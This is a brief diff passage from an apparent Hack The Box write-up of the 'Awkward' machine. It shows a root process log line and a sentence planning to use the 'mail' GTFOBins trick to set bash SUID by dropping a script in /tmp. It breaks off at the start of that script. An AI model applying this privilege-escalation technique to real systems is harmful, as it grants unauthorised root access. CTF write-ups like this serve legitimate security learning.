blnknlights/blnknlights.github.io/htb/machines/awkward/awkward.md

 2023/01/16 04:43:15 CMD: UID=0    PID=3636   | local -t unix
 ```

-let's try to use the mail GTFO to set bash to SUID, for that we'll start by dropping a SUID script in /tmp
+Let's try to use the mail GTFO to set bash to SUID, for that we'll start by dropping a SUID script in /tmp
 ```bash
 $ cat << EOF > asd
 > #!/bin/bash